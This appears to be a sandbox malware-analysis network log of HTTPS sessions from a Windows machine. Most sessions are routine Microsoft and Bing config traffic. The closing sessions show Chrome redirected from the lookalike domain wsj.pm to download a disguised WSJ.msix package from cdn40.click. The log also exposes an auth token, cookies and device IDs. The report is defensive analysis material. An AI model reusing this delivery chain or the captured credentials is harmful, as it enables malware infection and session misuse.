                                                                                                                2024-04-25 14:58:38 UTC4788OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                2024-04-25 14:58:38 UTC569INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                Expires: Thu, 25 Apr 2024 14:57:38 GMT
                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                x-ms-route-info: C529_SN1
                                                                                                                x-ms-request-id: 15bab184-effa-4e19-b2e8-f25e65db99af
                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F1A9 V: 0
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 11153
                                                                                                                2024-04-25 14:58:38 UTC11153INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                58192.168.2.174978713.107.5.88443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:38 UTC537OUTGET /ab HTTP/1.1
                                                                                                                Host: evoke-windowsservices-tas.msedge.net
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                                                X-EVOKE-RING:
                                                                                                                X-WINNEXT-RING: Public
                                                                                                                X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                                                X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                                                X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                                                X-WINNEXT-PLATFORM: Desktop
                                                                                                                X-WINNEXT-CANTAILOR: False
                                                                                                                X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                                                X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                                                If-None-Match: 2056388360_-1434155563
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                2024-04-25 14:58:38 UTC438INHTTP/1.1 200 OK
                                                                                                                Content-Length: 7285
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                ETag: -768392042_-1138153652
                                                                                                                Strict-Transport-Security: max-age=2592000
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-ExP-TrackingId: ef9e521c-d44f-4384-a3b2-70b92b7451ad
                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                X-MSEdge-Ref: Ref A: A5BA5D05350C4B159ACDFEFAC2000E91 Ref B: ATL331000105035 Ref C: 2024-04-25T14:58:38Z
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Connection: close
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 7b 22 46 65 61 74 75 72 65 73 22 3a 5b 22 68 69 67 68 71 75 61 6c 69 74 79 63 61 70 74 75 72 65 63 22 2c 22 79 6f 61 6c 77 39 38 30 31 63 66 22 2c 22 79 6f 63 33 37 32 31 22 2c 22 61 61 74 65 73 31 32 31 22 2c 22 79 6f 63 61 6c 38 33 30 22 2c 22 65 6d 70 72 6f 37 30 32 22 2c 22 79 6f 6e 6f 6e 32 34 38 22 2c 22 63 6f 6e 74 61 63 74 73 76 32 73 79 6e 63 6f 6e 6c 79 22 2c 22 79 6f 79 70 70 31 31 37 22 2c 22 79 6f 79 70 70 35 36 31 22 2c 22 79 6f 70 68 6f 31 35 36 22 2c 22 79 70 72 6f 6d 65 6c 65 73 73 22 2c 22 79 6f 72 65 6d 37 38 32 22 2c 22 79 6f 72 65 6d 33 32 35 22 2c 22 79 6f 72 6f 6d 39 33 39 22 2c 22 79 6f 79 70 70 36 33 38 22 2c 22 79 6f 61 61 6f 77 63 34 36 63 66 22 2c 22 79 6f 35 35 36 22 2c 22 79 6f 61 61 6f 32 36 37 22 2c 22 79 6f 70 72 69 32 35
                                                                                                                Data Ascii: {"Features":["highqualitycapturec","yoalw9801cf","yoc3721","aates121","yocal830","empro702","yonon248","contactsv2synconly","yoypp117","yoypp561","yopho156","ypromeless","yorem782","yorem325","yorom939","yoypp638","yoaaowc46cf","yo556","yoaao267","yopri25
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 2c 22 31 34 67 36 22 3a 22 61 61 74 65 73 31 32 31 22 2c 22 31 38 66 7a 22 3a 22 79 6f 63 61 6c 38 33 30 22 2c 22 31 68 6a 65 22 3a 22 65 6d 70 72 6f 37 30 32 22 2c 22 31 71 61 38 22 3a 22 79 6f 6e 6f 6e 32 34 38 22 2c 22 31 77 6d 74 22 3a 22 63 6f 6e 74 61 63 74 73 76 32 73 79 6e 63 6f 6e 6c 79 22 2c 22 32 69 77 6a 22 3a 22 79 6f 79 70 70 31 31 37 22 2c 22 32 6a 36 61 22 3a 22 79 6f 79 70 70 35 36 31 22 2c 22 32 6b 71 32 22 3a 22 79 6f 70 68 6f 31 35 36 22 2c 22 32 6c 61 64 22 3a 22 79 70 72 6f 6d 65 6c 65 73 73 22 2c 22 32 6f 63 64 22 3a 22 79 6f 72 65 6d 37 38 32 22 2c 22 32 72 65 6b 22 3a 22 79 6f 72 65 6d 33 32 35 22 2c 22 32 73 63 78 22 3a 22 79 6f 72 6f 6d 39 33 39 22 2c 22 32 74 70 33 22 3a 22 79 6f 79 70 70 36 33 38 22 2c 22 33 30 62 38 22 3a 22
                                                                                                                Data Ascii: ,"14g6":"aates121","18fz":"yocal830","1hje":"empro702","1qa8":"yonon248","1wmt":"contactsv2synconly","2iwj":"yoypp117","2j6a":"yoypp561","2kq2":"yopho156","2lad":"ypromeless","2ocd":"yorem782","2rek":"yorem325","2scx":"yorom939","2tp3":"yoypp638","30b8":"
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 32 36 34 22 2c 22 35 39 30 71 22 3a 22 34 61 33 30 64 34 35 35 22 2c 22 35 39 67 67 22 3a 22 32 69 32 68 65 31 31 38 22 2c 22 35 39 67 6a 22 3a 22 34 64 65 35 67 35 34 32 22 2c 22 35 39 76 7a 22 3a 22 62 65 63 34 34 37 35 37 22 2c 22 35 61 39 73 22 3a 22 39 38 34 65 39 37 37 34 22 2c 22 35 61 74 6b 22 3a 22 35 35 35 64 37 39 37 38 22 2c 22 35 62 61 74 22 3a 22 65 6a 66 34 36 37 39 35 22 2c 22 35 63 70 66 22 3a 22 34 39 62 34 67 31 33 33 22 2c 22 35 63 72 73 22 3a 22 33 62 66 39 67 38 35 35 22 2c 22 35 64 77 37 22 3a 22 69 34 37 62 65 31 37 38 22 2c 22 35 65 74 36 22 3a 22 32 34 38 66 61 31 38 36 22 2c 22 35 66 6c 32 22 3a 22 68 35 31 66 30 33 34 32 22 2c 22 35 66 79 6f 22 3a 22 68 64 65 31 67 32 36 37 22 2c 22 35 66 79 71 22 3a 22 34 6a 6a 66 62 37 36 38
                                                                                                                Data Ascii: 264","590q":"4a30d455","59gg":"2i2he118","59gj":"4de5g542","59vz":"bec44757","5a9s":"984e9774","5atk":"555d7978","5bat":"ejf46795","5cpf":"49b4g133","5crs":"3bf9g855","5dw7":"i47be178","5et6":"248fa186","5fl2":"h51f0342","5fyo":"hde1g267","5fyq":"4jjfb768
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 7d 7d 2c 7b 22 49 64 22 3a 22 59 6f 75 72 50 68 6f 6e 65 22 2c 22 50 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 41 41 4f 57 43 34 36 22 3a 36 34 30 30 2c 22 41 41 4f 57 43 34 37 22 3a 37 34 30 30 2c 22 41 41 4f 57 43 36 31 22 3a 31 36 30 30 2c 22 41 41 4f 57 43 36 32 22 3a 32 36 30 30 2c 22 41 41 4f 57 43 36 33 22 3a 33 36 30 30 2c 22 41 69 72 70 6c 61 6e 65 4d 6f 64 65 53 74 61 74 75 73 22 3a 74 72 75 65 2c 22 41 75 74 6f 48 79 64 72 61 74 65 64 49 6d 61 67 65 73 43 6f 75 6e 74 22 3a 30 2c 22 43 61 6c 6c 69 6e 67 41 6c 74 42 6c 75 65 74 6f 6f 74 68 50 61 69 72 69 6e 67 45 76 65 6e 74 22 3a 74 72 75 65 2c 22 43 61 6c 6c 69 6e 67 45 78 69 74 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 22 3a 74 72 75 65 2c 22 43 61 6c 6c 69 6e 67 4f 53 53 65 72 76 69 63 69 6e 67 46 69
                                                                                                                Data Ascii: }},{"Id":"YourPhone","Parameters":{"AAOWC46":6400,"AAOWC47":7400,"AAOWC61":1600,"AAOWC62":2600,"AAOWC63":3600,"AirplaneModeStatus":true,"AutoHydratedImagesCount":0,"CallingAltBluetoothPairingEvent":true,"CallingExitConfirmation":true,"CallingOSServicingFi
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 3a 74 72 75 65 2c 22 49 73 41 75 74 68 56 32 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 4d 65 64 69 61 50 61 63 6b 43 68 65 63 6b 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 68 61 74 46 69 6c 74 65 72 54 6f 67 67 6c 65 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 6f 6e 73 65 6e 74 56 32 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 6f 6e 76 65 72 73 61 74 69 6f 6e 56 69 65 77 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 48 69 64 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 4d 75 74 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 50 69 6e 6e 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 53 65 61 72 63 68 22 3a 74 72 75 65 2c 22
                                                                                                                Data Ascii: :true,"IsAuthV2Enabled":true,"MediaPackCheck":true,"MessagingChatFilterToggle":true,"MessagingConsentV2":true,"MessagingConversationView":true,"MessagingEnableHiding":true,"MessagingEnableMuting":true,"MessagingEnablePinning":true,"MessagingSearch":true,"
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 69 6e 67 54 6f 70 30 31 31 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 69 6e 67 54 6f 70 30 31 32 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 69 6e 67 54 6f 70 30 31 35 22 3a 74 72 75 65 2c 22 52 6f 6d 65 44 69 73 61 62 6c 65 64 22 3a 34 34 31 35 30 33 2c 22 53 65 63 75 72 65 43 6f 6e 74 65 6e 74 22 3a 74 72 75 65 2c 22 53 68 65 6c 6c 45 78 74 65 6e 64 65 64 4c 65 66 74 50 61 6e 65 22 3a 74 72 75 65 2c 22 54 65 73 74 46 65 61 74 75 72 65 32 22 3a 66 61 6c 73 65 2c 22 55 6e 69 76 65 72 73 61 6c 42 6c 75 65 74 6f 6f 74 68 50 61 69 72 69 6e 67 22 3a 74 72 75 65 2c 22 57 68 61 74 73 4e 65 77 43 4e 22 3a 74 72 75 65 2c 22 59 50 50 43 61 74 61 73 74 72 6f 70 68 69 63 45 72 72 6f 72 41 75 74 6f 52 65 73 65 74 22 3a 74 72 75 65 2c 22 59 50 50 43 6f 6e 73 65 63 75 74 69 76
                                                                                                                Data Ascii: ingTop011":true,"RemotingTop012":true,"RemotingTop015":true,"RomeDisabled":441503,"SecureContent":true,"ShellExtendedLeftPane":true,"TestFeature2":false,"UniversalBluetoothPairing":true,"WhatsNewCN":true,"YPPCatastrophicErrorAutoReset":true,"YPPConsecutiv
                                                                                                                2024-04-25 14:58:38 UTC1024INData Raw: 79 6f 35 35 36 3a 33 30 39 38 36 35 35 36 3b 79 6f 61 61 6f 32 36 37 3a 33 30 34 33 34 36 37 32 3b 79 6f 70 72 69 32 35 37 3a 33 30 34 36 34 34 33 33 3b 79 6f 31 37 39 3a 33 30 34 34 35 33 31 30 3b 79 6f 69 73 61 38 36 31 3a 33 30 35 32 35 38 36 38 3b 79 6f 72 65 6d 31 34 31 3a 33 30 34 38 36 33 35 33 3b 79 6f 79 70 70 36 35 32 3a 33 30 35 31 35 34 38 33 3b 79 6f 35 32 35 3a 33 30 35 35 33 39 38 35 3b 79 6f 36 30 36 3a 33 30 35 32 37 38 35 30 3b 79 6f 6e 6f 74 36 33 33 3a 33 30 36 32 36 30 37 38 3b 79 6f 79 70 70 38 35 39 3a 33 30 36 38 37 38 35 39 3b 79 6f 69 6e 64 36 36 35 3a 33 30 35 39 35 31 36 33 3b 79 6f 64 63 67 38 33 30 3a 33 30 37 31 32 39 34 39 3b 6f 6e 6c 79 5f 74 6f 61 73 74 63 6f 6e 74 65 78 74 6d 65 6e 75 3a 33 30 36 34 38 30 38 31 3b 61 6a
                                                                                                                Data Ascii: yo556:30986556;yoaao267:30434672;yopri257:30464433;yo179:30445310;yoisa861:30525868;yorem141:30486353;yoypp652:30515483;yo525:30553985;yo606:30527850;yonot633:30626078;yoypp859:30687859;yoind665:30595163;yodcg830:30712949;only_toastcontextmenu:30648081;aj
                                                                                                                2024-04-25 14:58:38 UTC117INData Raw: 38 33 38 35 30 33 3b 35 30 63 37 39 31 30 36 3a 33 30 38 33 38 36 31 39 3b 6a 61 35 63 34 32 34 39 3a 33 31 30 30 36 32 34 34 3b 68 33 65 64 34 31 36 31 3a 33 30 38 39 31 37 38 34 3b 61 62 69 30 67 38 31 37 3a 33 30 39 35 32 38 37 35 3b 61 35 34 66 61 35 37 34 3a 33 30 39 39 33 33 34 39 3b 64 69 66 32 32 32 31 39 3a 33 30 39 36 30 34 30 32 3b 22 7d
                                                                                                                Data Ascii: 838503;50c79106:30838619;ja5c4249:31006244;h3ed4161:30891784;abi0g817:30952875;a54fa574:30993349;dif22219:30960402;"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                59192.168.2.174978813.107.21.200443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:39 UTC2564OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                X-UserAgeClass: Unknown
                                                                                                                X-BM-Market: CH
                                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                                X-Device-OSSKU: 48
                                                                                                                X-BM-DTZ: 120
                                                                                                                X-DeviceID: 01000A41090080B6
                                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAfzLBKdQCm28CuuxSNuYztu7EsL7kM769LErRWmNGF0YaycAS/EF10D5AFL6ce5V6NubDyyAlEankxphWwbF3Zkcodae1JTiS82W5IqxsAZeIGIp7QaY6JTHKtRqt6KEyC7zcbmSdNqvjmfJnoE%2BYuJIWIOMvj9e61j67iSOsaW5yPtDm6A2Ko8k4kHvl9/y4OUYw7tos%2BqX7a4ajNojcn/%2BDbwK3H1IdFpEKv1oyFblwSLD/wqQ%2BOO4/XbmYMWd13OqRnoWy5/spJAcJnE8ZC9LKpqS2jPGInoQC6TbPU/y5J%2BxITZtEzQSCHjr16fdOhoPhBPAuaWyDmETEVNgdiwDZgAACKN/6GJ5hpirqAEcFppM/deTNK56h1fTsecQj6efW5sXGKIkb3Vb8yln%2BfGBzzH0wpS8cDLWTHoIgQzzC8PG/u1cCyFQ4nVgzCHM/ePS3Oe6yjui0nWDzNf2nMzcumEakiioNdNK/kN%2B1GY321OPE3p/BvtKwSMdr1%2Bc2IySS9Vc5o2PMLFR0q9euc9w%2BfJliN1EmcTHg9RYAomP3lXn763OoOEhblBx/VJrrUuwAaONp6Htg2s9szOieqv9dfGEkmwIUPkreePKED3QSTHdizIvkyD2ArEj181uEfEKFN0m7phP9ItbB05/LfQ82qVa7S6QucixnvjrolClT5Lwdc9T1w9T2XaIOYyzpmi%2BzcvTSudcp03zV9iyFr63AAle78T86hWtHziucLicgJTKDs/b8TV2EpUjPEIBRV2u81H4fMkbTaoOHVey9jj6iYx%2B/pAGeatoNz1Bsbn1XMcY5R9nv379Aax/6bj%2Brwhs6trImm9Q3jabPfKdI0HDeiZI747w1MqX/lOOi61lecoVwppq42ulTvxSMkQNCgWZN5djPBDl1ScMHpQTrnIAlpjTeycr2gE%3D%26p%3D
                                                                                                                X-Agent-DeviceId: 01000A41090080B6
                                                                                                                X-BM-CBT: 1714057116
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                X-Device-isOptin: false
                                                                                                                Accept-language: en-GB, en, en-US
                                                                                                                X-Device-Touch: false
                                                                                                                X-Device-ClientSession: 75625C546F974997B6B8D64F1964277D
                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                Host: www.bing.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                2024-04-25 14:58:40 UTC1463INHTTP/1.1 200 OK
                                                                                                                Cache-Control: private
                                                                                                                Content-Length: 2215
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                Set-Cookie: _EDGE_S=SID=1A4025EFE34D68930DD73183E25A6973&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                Set-Cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 20-May-2025 14:58:40 GMT; path=/; HttpOnly
                                                                                                                Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Tue, 20-May-2025 14:58:40 GMT; path=/; secure; SameSite=None
                                                                                                                Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                Set-Cookie: _SS=SID=1A4025EFE34D68930DD73183E25A6973; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                X-EventID: 662a6fa09caf4750a483b7072ccbce20
                                                                                                                UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                X-MSEdge-Ref: Ref A: 0FC90705D4B6498589229EA438A09BFA Ref B: ATL331000104051 Ref C: 2024-04-25T14:58:39Z
                                                                                                                Date: Thu, 25 Apr 2024 14:58:40 GMT
                                                                                                                Connection: close
                                                                                                                2024-04-25 14:58:40 UTC1618INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                                Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value
                                                                                                                2024-04-25 14:58:40 UTC597INData Raw: 6c 4e 65 77 42 61 74 63 68 53 69 7a 65 22 3a 7b 22 76 61 6c 75 65 22 3a 31 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4d 61 78 41 74 74 61 63 68 6d 65 6e 74 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 7b 22 76 61 6c 75 65 22 3a 33 30 37 30 30 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4c 6f 63 61 74 69 6f 6e 52 65 6d 69 6e 64 65 72 44 65 73 6b 74 6f 70 4f 6e 55 6e 6c 6f 63 6b 53 70 61 6e 22 3a 7b 22 76 61 6c 75 65 22 3a 32 34 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4c 6f 63 61 74 69 6f 6e 52 65 6d 69 6e 64 65 72 44 65 73 6b 74 6f 70 4f 6e 55 6e 6c 6f 63 6b 52 61 64 69 75 73 22 3a 7b 22 76 61 6c 75 65 22 3a 35 30 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 57 69 64 65 41 74 53 74 61 72 74 75 70 44 65 6c 74 61 4d 69 6e 57 69 64 74
                                                                                                                Data Ascii: lNewBatchSize":{"value":1,"feature":""},"MaxAttachmentSizeInBytes":{"value":307000,"feature":""},"LocationReminderDesktopOnUnlockSpan":{"value":240,"feature":""},"LocationReminderDesktopOnUnlockRadius":{"value":500,"feature":""},"WideAtStartupDeltaMinWidt


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                60192.168.2.1749789103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:53 UTC694OUTGET /download.php HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:54 UTC215INHTTP/1.1 302 Found
                                                                                                                Date: Thu, 25 Apr 2024 14:58:53 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Location: https://cdn40.click/files/WSJ.msix
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                61192.168.2.174979123.133.88.1904436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:54 UTC700OUTGET /files/WSJ.msix HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
